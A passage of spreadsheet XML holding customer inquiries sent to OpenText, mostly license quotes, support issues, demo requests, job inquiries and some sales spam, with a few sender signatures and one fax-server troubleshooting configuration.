    <t>We would like to get a quote for a few licenses of Brava reader. We have about 6 users that use the free version, but we've decided it would be best to upgrade to a normal version if the price is right. We need information regarding the cost per user, and a breakdown of license costs based on our total number of users..</t>
  </si>
  <si>
    <t>We are currently performing market research for a case management tool for one of our customers within HRSA. One of the COTS tools we are considering is Documentum_x000D_
_x000D_
Would you mind sharing the HHS/FDA Documentum POC name  and email/phone number so that we can send out additional information?</t>
  </si>
  <si>
    <t>We would like a quote for Brava Viewer for around 100 users. Please also advise the different licensing options we have as some users may not require use of this software all the time. Possibly a lower number of concurrent licenses would be suitable._x000D_
_x000D_
Thanks,_x000D_
Sarfaraz</t>
  </si>
  <si>
    <t>can`t install Brava Desktop</t>
  </si>
  <si>
    <t>We would to be in contact with a representative for a Documentum maintenance and renewal project for a client in Turkey.</t>
  </si>
  <si>
    <t>Any Job opening in HR</t>
  </si>
  <si>
    <t>Please provide contact details for a key accounts manager that we can approach for a global RFI regarding invoicing solutions.</t>
  </si>
  <si>
    <t>DWG program works with windows 7 on mail.</t>
  </si>
  <si>
    <t xml:space="preserve">My Brava reader in not allowing me to use it, it is saying it needs an update?? </t>
  </si>
  <si>
    <t>Need access to docs in link https://knowledge.opentext.com/knowledge/cs.dll/Open/15050695</t>
  </si>
  <si>
    <t>I'm trying to access the links below but I cannot access them because I'm not granted access to those links:_x000D_
_x000D_
1. https://knowledge.opentext.com/knowledge/cs.dll/open/matrix_x000D_
2. https://knowledge.opentext.com/knowledge/llisapi.dll/open/10151494_x000D_
3. https://knowledge.opentext.com/knowledge/llisapi.dll/open/15448194</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Manager,_x000D_
_x000D_
This is Misure, who worked as an International account manager at CCJK, _x000D_
a translation company with over 15 years of experience. _x000D_
We don’t hide my intent in writing this email, which is to see if you happen to have needs for translation services._x000D_
_x000D_
My main advantages as the sales person:_x000D_
Timely response when receiving your any inquiry or feedback_x000D_
Infinite patience and carefulness when handling your projects to confirm quality_x000D_
Professional and good attitude when talking with you_x000D_
_x000D_
CCJK’s professional and regular fields:_x000D_
Marketing, Law, Engineering, IT, Medical, Game, Financial, etc_x000D_
_x000D_
CCJK’s outstanding partners in the worldwide:_x000D_
Microsoft, GE global, Apple, Samsung, BMW, etc_x000D_
_x000D_
CCJK’s main business in the development of 16 years:_x000D_
Translation, Transcription, Voice over, Subtitling and DTP_x000D_
_x000D_
CCJK work with more than 80 languages and following are the language combinations _x000D_
that we are most professional with:_x000D_
Source language: English/German/French/Spain, etc. _x000D_
Target language: Chinese/Japanese/Korean/Malay/Indonesian/_x000D_
Thai/Vietnamese/Hindi/Arabic/Farsi, etc. _x000D_
_x000D_
CCJK can provide test translations free of charge if there have any needs._x000D_
Let's just find the rare opportunity to make friends with each other_x000D_
and achieve double-win business. _x000D_
How do you think “help each other and make progress together”? _x000D_
_x000D_
Regards,_x000D_
Misure_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need to buy Opentext core enterprise cloud. Please get back asap._x000D_
</t>
  </si>
  <si>
    <t>I am interested in Open Text ECM ENTERPRISE  CLOUD offering , please let me know if below features will be there in enterprise version :-_x000D_
External Collaboration_x000D_
Mobile Remote Wipe_x000D_
Mobile Access_x000D_
Desktop Sync_x000D_
Microsoft Outlook Integration_x000D_
Email Management_x000D_
_x000D_
Kindly let me know how I can initiate the payments to get cloud offering._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I am working as technical lead in Techmahindra India and providing the services to lifesciences clients._x000D_
We are currently exploring the various products in life sciences and can you provide your product details in life sciences area._x000D_
Please let me know if need any more details._x000D_
_x000D_
Regards_x000D_
venkata Gopireddy</t>
  </si>
  <si>
    <t>We are evaluation the possibility of using opentext in our company and we have few security concerns regarding uploaded content through ECM everywhere, TempoBox and MFT. How is it been handled and whether it is linked to Server antivirus in real time or it have to be configured to scan uploaded files.</t>
  </si>
  <si>
    <t>Datafinity is a Captiva Capture specialist company. We are partners to OpenText in South Africa, we are interested in setting up an office in dubai to specialize in enterprise implementations of Captiva Capture. Could you please put us in contact with your partner channel to discuss opportunities and setup meetings?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir, die Firma SCHÜTZ GmbH &amp; Co. KGaA, haben Ihren Content Server 16.0.2 V1136 (xECM) als DMS im Zusammenspiel mit SAP im Einsatz. Um mir und weiteren neuen Mitarbeiteren eine einen Einstieg in das Tool zu geben, bitte ich um die Zusanedung einer Produktbeschreibung und Anwenderdokumentation (Handbuch)._x000D_
_x000D_
Ziel ist es, das Tool in diversen weiteren Abteilungen auszurollen und jedem Interessierten die Möglichkeit zum sofortigen Selbststudium zu geben._x000D_
_x000D_
Schwerpunkt liegt vor allem darin, das DMS über eine die integrierte Web-Oberfläche (Workspace) eigenständig zu bedienen._x000D_
_x000D_
Des Weiteren bitten wir um eine Konzept-Übersicht zur Produktschulung (Schulungskatalog inkl. Erläuterung des Bezuges zu unserer installierten Basis)._x000D_
_x000D_
Vielen Dank und freundliche Grüße_x000D_
Bastian Lambertz</t>
  </si>
  <si>
    <t>My company wants to buy Brava Desktop TXL version 16.0.2 as the latest version does not work in our computer. Please advise.</t>
  </si>
  <si>
    <t>We have Brava Desktop 7.2 software that we need to reinstall on a new machine. However, we are not able to access now the license website. Could you please help us on this matter._x000D_
_x000D_
Many thanks.</t>
  </si>
  <si>
    <t>Hallo,_x000D_
is Brava! Desktop 7.3 DXP - 2D AutoCAD Limited, _x000D_
reading .emf Files ?_x000D_
thanke you for your answer_x000D_
B.Broger</t>
  </si>
  <si>
    <t>Require price quotation for OpenText Annotation + Redact for SharePoint 2016 (Per 2 VOSE and per 2 CPU)</t>
  </si>
  <si>
    <t xml:space="preserve">  Will the new version of Brava Reader 16.2 Desktop run on windows 7? </t>
  </si>
  <si>
    <t>We are looking at content management solutions like Alfresco and Logical doc on behalf of one of our clients._x000D_
_x000D_
Both companies allow us to do some testing to get a hands on understanding of their solution._x000D_
_x000D_
I am having difficulty understanding your offerings that are comparable._x000D_
_x000D_
Can someone call me and provide an overview of the one or two solutions that would provide the client with a document management solution similar to the solutions above._x000D_
_x000D_
As well, I would like to get an understanding of your pricing structure._x000D_
_x000D_
Thank you kindly._x000D_
_x000D_
I hope to hear from you soon._x000D_
_x000D_
Robert Taylor</t>
  </si>
  <si>
    <t xml:space="preserve">We need to know if you have an official reseller in Colombia. I need to buy 6 Xceed licenses (Exceed 14 and secure shell 14)._x000D_
Thanks a lot. </t>
  </si>
  <si>
    <t>we found a bug in Streamserve for process M3 MWS640PF. the process has different result for print out and saving file.</t>
  </si>
  <si>
    <t>Info re. DAM and integration w/ Adobe CC apps.</t>
  </si>
  <si>
    <t>Interested in setting up a conference call to ask preliminary market research questions and get very general pricing information.</t>
  </si>
  <si>
    <t>I am an Independent, Canadian Artist, and I have created a special event for the Performance Studies International Conference, coming up in Germany in early June. It is called the Diverse Abilities panel. The purpose of this panel is to both raise awareness of, and create more work opportunities for Artists of Diverse Abilities, (my created term to replace DISabled) all around the world._x000D_
_x000D_
My project was selected from 500 submissions from 40 countries._x000D_
_x000D_
I am asking you to be one of my key Sponsors. I am also asking if you can circulate my website to your contacts, and/or help support this project in any other ways, of which you can think._x000D_
_x000D_
I am attaching an article which I wrote that can also be found on my website including photos._x000D_
This opportunity to have Artists of Diverse Abilities share our ideas and perform on this panel in two months, would go a long way towards creating more Inclusive, paying work for Artists of our Diversities, all around the world!  But I can't do this project, unless 100% of the costs of it are raised, and as soon as possible, so that I can hire and start paying everyone._x000D_
_x000D_
Your assistance in this matter would be forever appreciated, by countless numbers of Artists of Diverse Abilities, in Canada and all around the world!!!_x000D_
We need to leave on June the 6th so your response to this e-mail as soon as possible would be greatly appreciated._x000D_
Thanks again!_x000D_
_x000D_
The Diverse Abilities Panel: Our Proposed Trek to Germany _x000D_
by Ariel Len of Zoey’s Projects _x000D_
There is still a persistent and incorrect perception amongst most of the public - and even amongst many worldwide government and other funders, investors, sponsors, arts/entertainment industry employers, and even many arts organizations - that there is a lack of Artists of Diverse Abilities (my created term to replace the DIScriminatory word DISabled) out there.  _x000D_
However, the inverse is actually true.  There is in fact an Overflow or Abundance of Fantastically, Talented Artists of Diver</t>
  </si>
  <si>
    <t>The failure of the regularization plan._x000D_
We are writing with frustration and pain this letter to denounce the hypocrisy of politicians involved in the plan of regularization of foreigners in the Dominican Republic, and you can know the truth and read it here http://hoy.com.do/se-encamina-al-fracaso-el-plan-de-regularizacion-de-extranjeros/ Or Google it "Failure regularization plan in RD" you will see the truth of this national shame._x000D_
We have been deceived, like fools we were doing queue bringing documents to their offices in order to have the right to live as a human, but turned away, for this reason we are denouncing this humiliation, social injustice. With tears and broken hearts we are asking for help, screaming and pain we request your assistance in resolving this problem that affects us as foreigners and to our children born in the Dominican Republic._x000D_
Please do not ignore our cries, we are tired of being discriminated, tired of being disappointed in this country and treated like garbage.Please take concrete actions in our favor, we beg you, have mercy oh please help us get this Identification Card for the sake of our future and our family._x000D_
We can not continue to suffer like this anymore, so please help! Help! What is worse and shameful, the press published racist videos against us:http://www.todalatv.com/video/comunicador-dice-luisito-pie-asqueroso-haitiano-pueblo-no-nada-celebrar-video/ and Here http://videosyoutube.cc/video/comunicador-dice-luisito-pie-es-un-asqueroso-haitiano-y-el-pueblo-no-tiene-nada-que-celebrar-video_x4prnc2</t>
  </si>
  <si>
    <t>Current customer, completing annual vendor review and need supporting documentation. Please put me in contact with someone who can assist. Thank you.</t>
  </si>
  <si>
    <t>Hi_x000D_
My name is Diogo, I'm Brazilian and I'm 36 years old._x000D_
Work with video editing and post production (Adobe Premiere, After Effects and also with photoshop and Illustrator)_x000D_
Me and my wife, we arrived in Canada 2 months ago._x000D_
We came to see why she is doing post-doctorate at the University of Waterloo_x000D_
I'll send the link with my reel_x000D_
Link: www.youtube.com/watch?v=98GykYJ-QfY_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext,_x000D_
_x000D_
we need to purchase documentum for our client in indonesia._x000D_
_x000D_
around 360 license, please quote us._x000D_
_x000D_
-- _x000D_
Terimakasih_x000D_
Regards,_x000D_
Abdullah Ali_x000D_
_x000D_
PT Teknocal Energi Bersinar_x000D_
abdullah@teknocal.com_x000D_
Wisma Korindo lt 5, JL M.T. Haryono, Kav. 62_x000D_
Pancoran, 12780 Jakarta Selatan, Indonesia_x000D_
Office : 021- 7976039 / Mobile :081998425949_x000D_
www.teknocal.com_x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
I'm looking for a software to extract data from documents (such as payrolls, account statements or tax notices)_x000D_
Your solution seems to be interesting, is it possible to have a demo or a trial version ? _x000D_
Regards,_x000D_
_x000D_
François Sevaistre</t>
  </si>
  <si>
    <t>We are an IBM Maximo partner looking for a better reporting solution than normal BIRT for our federal clients.  I would like to schedule a demo so my team can evaluate iHub as a potential solution.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a content/knowledge management tool._x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>Our account is not active, we had made a payment that should have been received last week and need access to our catalog._x000D_
The account # is US01-104327</t>
  </si>
  <si>
    <t>Account review to determine what OpenText services we are currently utilizing and what additional services might benefit Longchamp. Network ID is R2631</t>
  </si>
  <si>
    <t>I would like to have an advice on which product to use preferably for optimal integration with SAP + possibility to have a comparison between Open Tex and Documentum with that perspective + future plans for development of both products.</t>
  </si>
  <si>
    <t xml:space="preserve">To,_x000D_
OpenText Corp,_x000D_
_x000D_
Please consider this mail as important and require your acknowledgement._x000D_
_x000D_
Currently, we are organizing 5th Annual Congress on Climate Change (Climate Congress 2017) during August 24-25, 2017 in Birmingham, UK . We would like to notify you about exhibitor slots at our upcoming annual conference. _x000D_
Why to Sponsor/exhibit at Climate Congress 2017?_x000D_
_x000D_
Unique platform for business promotion _x000D_
Global Networking Opportunities_x000D_
Best Visibility from your target audience, Globally _x000D_
Best Economic Advertisement platform_x000D_
Extreme Social Media Promotion _x000D_
_x000D_
Group Discounts Available!_x000D_
_x000D_
Please feel free to contact me for further queries_x000D_
_x000D_
Regards,_x000D_
Eva Bella_x000D_
Climate Congress-2017_x000D_
E-mail: climatecongress@alliedconferences.org_x000D_
Phone: +1 (828) 214 3944_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>End user manual for VIM</t>
  </si>
  <si>
    <t>Bitte um Angebot per Mail für Brava DWG Viewer._x000D_
Besten Dank im Vorraus.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are interested in receiving a quotation to use your product Brava Reader._x000D_
Regards,_x000D_
Nerea</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The product overview for OpenText GISLink for ESRI® is outdated._x000D_
_x000D_
ESRI ArcIMS and ArcView do not exist anymore:_x000D_
_x000D_
Which are the up-to-date modules of ESRI at this moment?_x000D_
_x000D_
With kind regards,_x000D_
_x000D_
Jan Janssen </t>
  </si>
  <si>
    <t>I want to know if you guys have openings for HP Exstream Dialogue Designer.</t>
  </si>
  <si>
    <t>Your sales site likely causes many people to run away from one of the best PDF products on EARTH. Unbelievable how your sales site is so poor. For that reason alone, I keep using Adobe which is bad. I have been frustrated by you 25 times in 10 years</t>
  </si>
  <si>
    <t>Greetings for the day is there any internship opportunity for just BE passed out students._x000D_
I am going to complete my bachelor's in Computer Engineering and want to do internship in your esteemed organisation. Waiting for handy reply.Thank you!</t>
  </si>
  <si>
    <t>Do you still support Hummingbird Bi query?</t>
  </si>
  <si>
    <t>I came across your website after searching for Electronic companies on Google._x000D_
_x000D_
And I was wondering if you would like to partner up? _x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second animated explainer video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more and get started at www.30secondexplainervideos.com/explainer_x000D_
_x000D_
Or can you shoot me a quick email for a brief discussion!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer</t>
  </si>
  <si>
    <t>Hi_x000D_
CSC looks after clients licenses as part of a outsourcing contract. We have a client in the UK, who we require to do a full license validation in order to clarify that the licensed software is purchased in their name. Could you kindly give me the correct contact details (name, Phone &amp; Email address) of the right person I should be dealing with._x000D_
My Details are pjohns38@csc.com, phone +44 (0) 7388 916016_x000D_
_x000D_
Thanks Paul</t>
  </si>
  <si>
    <t>gbfv</t>
  </si>
  <si>
    <t>Hallo,_x000D_
just now i work with your Brava Free DWG Viewer, Build 16.O.2.22 Package 16.0.2.11 everything works well.I Need to open .emf  Files, please tell me witch product you can offer me._x000D_
thanke you for you Help_x000D_
B.Broger</t>
  </si>
  <si>
    <t>Dear OpenText/IGC Team,_x000D_
_x000D_
our customer (Andorra Immobilien, Handelskai, 1200 Wien) purchased IGC Brava Viewer for SharePoint and software insurance (1-year) about 2 years ago. Now we get an error according Brava Viewer since some weeks. The log messges aren't very helpful._x000D_
Can you send us an offer for upgrading software insurance? Or is there another possibility to get support for Brava Viewer?_x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Best regards,_x000D_
Martin Ettl</t>
  </si>
  <si>
    <t>I want to write Documentum E10-110 certification eaxm but ubable to find from where to register for this. whether EMC or PearsonVue or Opentext. Please guide.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
When I load Brava, it says 'invalid licence, unable to load files'. I have a licence and it was working fine for the past 2 months. This message also comes up when I am on the plane travelling._x000D_
_x000D_
Can you please fix this for me urgently. Many thanks._x000D_
_x000D_
Daniel</t>
  </si>
  <si>
    <t>I am looking into a document sharing system for our business, akin to SharePoint. Is it possible to have an online demo for OpenText?</t>
  </si>
  <si>
    <t>Hello.  I am attempting to create login credentials for two Cal-Sierra Technologies employees, so they may take sales and technical training courses for an OpenText/Cal-Sierra Technologies, Inc. partnership.  Here is their contact information:_x000D_
David Shih-Technical  dshih@calsierra.com_x000D_
Demi Augustine-Sales  daugustine@calsierra.com_x000D_
Thank you in advance for any assistance you may offer.  If you need the error screens I received trying to accomplish the above, I can e-mail those to you._x000D_
Kate_x000D_
Kate M. Rafferty-Coronado_x000D_
krafferty-coronado@calsierra.com</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to contact Open Text Support on the behalf of our client Eastern Health. Open Text Ticket Reference# 3028378 </t>
  </si>
  <si>
    <t>Reviewing Information Management (EDRMS) products</t>
  </si>
  <si>
    <t>Hi, _x000D_
We want to give the access to our partner Macy's. But not sure how to do it. Can you please help?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need Composer Ciphersoft as a license product.  I wan to convert Oracle Forms 10g, 11g to Oracle ADF. Please send me the license cost with all terms &amp; conditions. _x000D_
Best Regards_x000D_
Zahoor Ahmad_x000D_
Zahoor</t>
  </si>
  <si>
    <t>We are an IT reseller and we have a client interested in getting some OpenText training onsite at their location.  Do you have a reseller program and/or would you entertain extending discounts to us so taht we can resell your training?_x000D_
_x000D_
Thank you in advance for any assistance that you can provide!</t>
  </si>
  <si>
    <t xml:space="preserve">I am contacting you on behalf of the George Mason’s School of Business. 30 student participants and 2 professors pursuing their MS degrees in Technology Management will visit Munich in June 2017 to learn about the business environment in Germany and global business issues pertaining to its tech industries. While in Munich the group is very interested in an executive level visit with Open Text.  It would be an excellent experience for our students to be able to interact with your executives to get their perspective on the regional business environment, business trends, and engage in a factory visit._x000D_
_x000D_
The best time in our schedule for this visit would be on Wednesday June 23, 2017 at 10:00 or 2:00pm.   The visit should last about 1.5 hours and include a business presentation as well as a time for discussion and Q&amp;A. Can you please let me know ASAP if this visit would be a possibility? _x000D_
_x000D_
Visiting with Open Text would be an excellent opportunity for our business students.  Thank you for your kind consideration to this request.  I am happy to further discuss the potential goals of this visit or furnish you with more information moving forward. _x000D_
_x000D_
I look forward to hearing from you. Thank you._x000D_
_x000D_
Best regards, _x000D_
Ashley Trudeau </t>
  </si>
  <si>
    <t>Need to be added to auth to download. Order was by Rick Schulte Your OpenText Order SUS08460953 / POAS1CF188D8DA CC</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am interested in gathering more info on your fax campaign services. We currently manage and transmit a daily publication via fax. I'm particularly interested in knowing whether faxes can be sent to multiple targeted lists and automated daily fax broadcasting are available. Also, what are the formats that files can be transmitted in?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cindy</t>
  </si>
  <si>
    <t>Order a Viewer License for Alchemy gold</t>
  </si>
  <si>
    <t>Access to catalog.. password problem.  I had not accessed in quite a while.. when I tried to log in I rec'd an error message that login was incorrect.  I tried to reset password but have not rec'd an e-mail with password reset.  Should I try again?  Or can you help me?    Q858</t>
  </si>
  <si>
    <t>Need to find out if software complies with our local security policy.  Questions within are 1. Interfaces with LDAP or AD, 2. Store Passwords?,3. Can support min 14 char? 4. Support Max 32 passwords? I'm not sure if we have a support contract or not.  If so, can you help point me in the right direction?</t>
  </si>
  <si>
    <t>Hi.  We are having issues with your KoVIS software and we were wondering if you still offer support for that software.</t>
  </si>
  <si>
    <t>Need the Dell Account Rep for Open Text/Documentum to contact me as soon as possible re:  potential sale/licensing</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in training System Analysts, Quality Assurance, and Production Support people on the Global 360 application.  </t>
  </si>
  <si>
    <t xml:space="preserve">Interested in integrating one of our clients eDOCs 5.3.1 system with their SAP ECC 6.0 and Kofax Capture 10.2. Can the Content Access component work for this. I would like some more information on this please </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
We are moving from two physical Fax-Servers with RightFax installed on them to two virtual servers. It seems like the only options we have using Right Fax with virtual servers is to use a Fax Gateway to do Fax over IP (FoIP) or use SIP Trunking in which case we would need a session border controller and the cloud-based Fax servcie. Did I understand the documentation correctly?_x000D_
_x000D_
If so, could you please give us a quote for a Fax Gateway with 4 channels? We would have to get in touch with Cisco or Dialogic to get a quote for a session border controller and the cloud-based fax service, or do you offer those services as well?_x000D_
_x000D_
Thank you,_x000D_
Daniela Relaford_x000D_
</t>
  </si>
  <si>
    <t>I am starting a project with OFM to review ECM vendors on the Master Contract list.  Please send me the contact information for your Washington State representative.  Thanks</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
I hope this email finds you well. By way of introduction, my name is Mahmoud Barakat and I work for BPE Partners based out of Cairo, Egypt. We are a $300 million private equity fund which is interested in bringing multinational and joint venture partners to Egypt. We are already the multinational partner of choice in Egypt and have joint ventures with companies such as Total and Daikin and formerly Carrier. We believe that a joint venture with OpenText could be a very lucrative idea given that our portfolio already contains the largest system integrator and software company in Egypt and we know this space well already. We also believe that OpenText would benefit greatly from considering Egypt as their next international destination._x000D_
 _x000D_
If this opportunity is of interest please let us know and we could discuss it further and i could send you more information and materials._x000D_
_x000D_
Best,_x000D_
Mahmoud</t>
  </si>
  <si>
    <t>COBRANÇA - TODO O MÊS TEMOS QUE COBRAR A NOTA FISCAL E BOLETO. ESTE MÊS NOS ENVIARAM 5 COBRANÇAS QUE ESTAVAM EM ABERTO . COMO PODEMOS REGULARIZAR ESTA SITUAÇÃO? JÁ ENVIAMOS VÁRIOS E-MAILS PARA LINDA ANDERSON , SEM SOLUÇÃO._x000D_
AGUARDAMOS UM RETORNO. GRATA</t>
  </si>
  <si>
    <t>Hello, Our law firm is currently looking into data management options. I would like to request a demo if possible?_x000D_
_x000D_
Thanks,_x000D_
Andrew</t>
  </si>
  <si>
    <t>Hi Dear,_x000D_
 _x000D_
My name is Juliana Giraldo Cardona. I work in Colombia, for the company Kinnesis Solutions S.A.S. Our company sells products and solutions for utilities in power transmition and distribution applications in automation and asset management._x000D_
_x000D_
Currently, we are supporting a client to acquire a Software. I have seen that your company has the Windows emulator software for AIX environment._x000D_
_x000D_
I am interested in the following Software that you offer "Open Text Exceed Version 14" &amp; "Open Text Security Shell Version 14". Also, I would like to know more about your company, technology and experience._x000D_
 _x000D_
Thanks a lot and best regards,</t>
  </si>
  <si>
    <t xml:space="preserve">We want to convert our onsite solution to your web-based cloud fax solution. can you please call me at 7274600419 thanks </t>
  </si>
  <si>
    <t>Hello_x000D_
_x000D_
Is there a connector for Documentum Content to integrate with SharePoint Online? I know you have a 3rd party connector for MOSS 2007 by Wingspan DocWay.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Notre société ITS prestataire technique pour les paiements par carte d'achat souhaite s'associer à un prestataire de dématérialisation afin de pouvoir proposer à l'ensemble de nos clients une solution de dématérialisation._x000D_
_x000D_
Je souhaiterais pouvoir échanger avec vous sur ce projet._x000D_
_x000D_
Cordialement,</t>
  </si>
  <si>
    <t>Is there anyway this is still available for windows 7?</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
The Department of  Veteran Affairs Section 508 Office, is currently reviewing COTS products that they are currently using (or a request internally for purchase/use has been made) to ensure that the products are Section 508 conformant. Your product, OpenText Process Platform, has been identified as one that the Department of the Veterans Affairs is using. Can you please send information available, such as, a Voluntary Product Accessibility Template (VPAT) or product description regarding Section 508?_x000D_
Paul R. Alexander III_x000D_
202-461-8837_x000D_
Department of Veteran Affairs</t>
  </si>
  <si>
    <t xml:space="preserve">I have a task to assist a project owner that is seeking to bring up 1 production server, 1 developer server, and 1 test server and will install EMC Content server (for 6 users).  Please let me know if the current EMC Documentum Content Server licenses for 3005 licensed user entitlements are specific only to the VCE Program or can they be exchanged, interchanged, or aggregated with entitlements of another program or resource  Or do does the new project required new/additional license to be procured? _x000D_
 _x000D_
Please send email reply or to schedule a meeting to my email address.   Need this i need this information ASAP - was working with Dell representative that could not provide the information. </t>
  </si>
  <si>
    <t>Request information/demo on an on-premise fax solution to replace an existing solution.</t>
  </si>
  <si>
    <t>I come from the ECD acquisistion and was wondering if Brava already supports Documentum D2 4.7</t>
  </si>
  <si>
    <t>We are interested in purchasing your Brava Reader software for use by our 4 estimators.  We will need it installed on our server.</t>
  </si>
  <si>
    <t>good afternoon_x000D_
we have issue in our edocs dm server about NTDLL.DLL,  I've found the KB4933160, but the hotfix is not downloadable, please provide us the correction._x000D_
Thanks_x000D_
Manuel Tolotti</t>
  </si>
  <si>
    <t>Gostaria de saber o valor das licenças para 90 maquinas do produto (Brava Dwg Viewer)._x000D_
Fico no aguardo.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
One of our clients in the west coast of the US is looking for a DMS solution.  We would like to evaluate the suitability of Opentext and see a demo of the product.  Kindly get in touch with me to discuss further.</t>
  </si>
  <si>
    <t>Brava! Desktop in Finland. Hi! We´d need reseller pricing for Brava! Desktop, 10 seat, Image Only. Please provide also details of ordering process</t>
  </si>
  <si>
    <t>Interested to apply for Credit and Collection Staff</t>
  </si>
  <si>
    <t>Nie mam szczęścia się do Państwa dodzwonić na numery 61 858 00 10 i 61 8580012 - Proszę o kontakt telefoniczny do Państwa biura w Poznaniu, w Malta House</t>
  </si>
  <si>
    <t>We used to have your product but our licence has expired in 2015 so I am looking at a quote to renew the licence. We used to be Hampshire Partnership NHS Trust but are now known as Southern Health NHS Foundation Trust</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Open Text Right fax Enterprise version 10.6.0.330- 1 qty -pls quot resller price_x000D_
</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
ich bin Wissenschaftliche Mitarbeiterin am ISW, einem Institut der Universität Stuttgart. In meinem Forschungsprojekt muss ich mit einer Software von EXAPT arbeiten. Diese wird mir auch von EXAPT (ebenfalls Mitglied des Forschungsprojektes) zu Verfügung gestellt. Um die Software nutzen zu können, benötige ich allerdings eine Lizenz für SQLBase. Da EXAPT mir diese aber nicht zu Verfügung stellen kann und ich keine finanziellen Mittel habe, wollte ich nun nachfragen, ob es bei Ihnen kostenlose oder vergünstigte Forschungslizenzen gibt? Eine Finanzierung aus eigenen Mitteln ist schwer, da wir ansonsten keine Anwendung für SQLBase haben. Es handelt sich um folgende Lizenz:_x000D_
_x000D_
FX-P10B00000-NT-PC _x000D_
EXABase_x000D_
Systemmodul für den Zugriff der EXAPTSysteme auf die EXAPT-Datenbasis EXABase_x000D_
(OEM-Version nur für EXAPT Anwendungen)_x000D_
- OEM Partnervertrag_x000D_
_x000D_
Über eine Antwort (gerne auch telefonisch; hier bin ich aber nicht durchgekommen) würde ich mich sehr freuen!_x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
Anja Elser</t>
  </si>
  <si>
    <t>i would like to know if Brava Reader is free</t>
  </si>
  <si>
    <t>HI, We have a training request on OpenText products from one of our customer. Please connect me with appropriate person to discuss on this further.</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
im Rahmen meiner anstehenden Bachelorarbeit über die Einführung der elektronischen Rechnung bei der Bundesagentur für Arbeit interessiere ich mich für optische Texterkennung (OCR). Gerne würde ich mehr über Ihre OCR-Software erfahren und wollte Sie fragen, ob es möglich ist mir weitergehende Informationen zu der Funktionsweise und den Möglichkeiten dieser Software zukommen zu lassen._x000D_
Da die Bundesagentur für Arbeit auch den Einsatz Ihrer OCR-Software plant, würde dies auch dem Projekt zugutekommen._x000D_
Mit freundlichen Grüßen_x000D_
Philipp Eich</t>
  </si>
  <si>
    <t>I have a problem; after migration of voice gateways from MGCP to SIP, rightfax doesn't work. I can't even get a fax signal when I call. I can see that I am sending INVITE messages from my router, but I am not getting any reply from my rightfax. _x000D_
I have a dial peer on voice gateway:_x000D_
dial-peer voice 3974 voip_x000D_
 description to RightFaxServer_x000D_
 destination-pattern 2003974_x000D_
 progress_ind setup enable 3_x000D_
 session protocol sipv2_x000D_
 session target ipv4:10.144.220.8_x000D_
 voice-class codec 711_x000D_
 dtmf-relay rtp-nte_x000D_
 fax-relay sg3-to-g3_x000D_
 fax protocol t38 version 0 ls-redundancy 0 hs-redundancy 0 fallback none_x000D_
 ip qos dscp cs5 media_x000D_
 ip qos dscp cs3 signaling_x000D_
 no vad_x000D_
_x000D_
2003974 is the local number of the fax; 10.144.220.8 is ip address of the fax._x000D_
_x000D_
On the CUCM, i have configured SIP trung ti the right fax server, route pattern pointing to that SIP trunk. More or less the exactly the same setup, that works with another rightfax server. .When I try to call fax from CUCM directly, I can't also hear fax tone._x000D_
Do you have any suggestion how to resolve my problem?_x000D_
_x000D_
Regards,_x000D_
Jelena</t>
  </si>
  <si>
    <t>Dear Open Text,_x000D_
_x000D_
The company is currently using the eDOCS DM 5.3.1 as the Corporate Document Repository. Currently we are in the process of upgrading our SAP Netweaver to version 7.5. In line with this, the SAP BW Analyzer is being upgraded as well. After the upgrade, we noticed that the new documents from SAP BW Analyzer cannot be saved in eDOCS DM. The Aqua engineer here informed us that the Excel Save macro for eDOCS DM and SAP BW are conflicting each other. Kindly advise how we can go about integrating both eDOCS and SAP BW. _x000D_
_x000D_
In case this is not the correct forum for me to inquire, please let me know the proper support group to contact._x000D_
_x000D_
Best regards,_x000D_
Jake Fruelda</t>
  </si>
  <si>
    <t>I have an external company that has developed some business processes for me. I need to take over the system but need to make provision for licensing. they used Metastorm V9. Please advise on estimates. also, is it possible to transfer licensing from one company to another as I will be taking over the employees that developed the system.</t>
  </si>
  <si>
    <t>Mr. Yu Chi Wang (Antonio) has applied for employment with Metron Shenzhen Limited and has named you as a former employer. In order to make an informed hiring decision, we need to know the applicant's work history. _x000D_
We would like to have direct email to HR department._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Does the Brava viewer plugin support IBM Content Navigator 3.0 and FileNet Content Manager 5.2.1?_x000D_
http://www.infograph.com/sites/default/files/BR7-IBM-CN.pdf</t>
  </si>
  <si>
    <t>Looking for more information about Document Management system and would like to have your system demonstration</t>
  </si>
  <si>
    <t>D i need to change to windows 10 in order to use Brava Desktop?</t>
  </si>
